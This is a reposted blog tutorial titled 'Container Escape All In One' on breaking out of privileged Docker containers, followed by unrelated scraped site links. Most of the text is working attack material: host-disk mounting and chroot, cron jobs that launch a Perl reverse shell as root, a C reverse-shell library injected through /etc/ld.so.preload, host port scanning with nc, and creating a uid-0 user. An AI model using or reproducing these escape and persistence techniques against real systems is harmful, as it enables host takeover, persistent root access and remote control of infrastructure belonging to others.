Container Escape All In One

Enterprise 2023-07-12 15:05:27 views: null

Article Directory

Improper configuration of CAP permissions

privileged, privileged container privilege escalation

Test environment configuration

docker run -it --privileged ubuntu:18.04

Actual environment use

If you see that CapEff is 0000003fffffffff, it means that it is a privileged container and can escape

cat /proc/1/status|grep CapEff
CapEff:	0000003fffffffff

Escape method, mount the host root directory

fdisk -l|grep Linux
mkdir /host
mount /dev/vda1 /host
chroot /host

At this time, it is only the escape at the file system level, and it has not escaped completely. The next method needs to be used

Scheduled Tasks

/var/spool/cron/crontabs/ for ubuntu debain
ls -la /var/spool/cron/crontabs

If the directory exists, it means we can write a crontab

echo $'*/1 * * * * perl -e \'use Socket;$i="127.0.0.1";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'' >> /var/spool/cron/crontabs/root
chmod 600 /var/spool/cron/crontabs/root

Then just run away

/var/spool/cron for centos
ls -la /var/spool/cron/

If the directory exists, it means we can write a crontab

echo $'*/1 * * * * perl -e \'use Socket;$i="127.0.0.1";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'' >> /var/spool/cron/root
chmod 600 /var/spool/cron/root

ld.so.preload

#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <arpa/inet.h>
int tcp_port = 8080;
char *ip = "127.0.0.1";
__attribute__((destructor)) void test(){
	remove("/etc/ld.so.preload");
	int pid;
	if((pid=fork())==0){
        int fd;
        struct sockaddr_in addr;
        addr.sin_family = AF_INET;
        addr.sin_port = htons(tcp_port);
        addr.sin_addr.s_addr = inet_addr(ip);
        fd = socket(AF_INET, SOCK_STREAM, 0);
        connect(fd, (struct sockaddr*)&addr, sizeof(addr));
        dup2(fd, 0);
        dup2(fd, 1);
        dup2(fd, 2);
        system("/bin/bash");
	}
}

gcc evil.c --shared -fPIC -o evil.so

Upload evil.so to /tmp

echo '/tmp/evil.so' >/etc/ld.so.preload

Then the next time the system will automatically load this so, and can achieve non-perceptual injection to achieve escape, but this kind of injection still needs similar operation and maintenance operations to be triggered, or a new process is created

ssh

When the file system escapes to the host, port scanning can be done

nc -nvz -w2  172.17.0.1 1-65535 2>&1|grep succeeded

If it is found that the host host has opened the ssh service, then we can directly ssh log in to the host host to escape
directly adduser

adduser test
passwd test

At the same time, you can modify /etc/passwd to change the test uid to 0 and become root

Guess you like

Origin blog.csdn.net/azraelxuemo/article/details/131603382
Recommended
Ranking
#2019110700005
What materials and procedures are required for patent transfer
What is the blockchain Ethereum triplet state root transaction root receipt root
Front-end study notes 04 --- About the insertion of html pictures and videos
Documents required for the filing of WeChat Mini Programs in special industries, the filing process of WeChat Mini Programs in special industries, how to file WeChat Mini Programs in special industries
2017 Qingdao-site tournament I The Squared Mosquito Coil
[BZOJ3165][HEOI2013]Segment (line segment tree without marking)
Kettle series: KettleEasyExpand, an open source Kettle universal plugin by Ma Jinju
The latest tutorial on making framework for iOS
DAX Section 6: Statistical Functions
Daily
More
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)

Code World

© 2018 codetd.com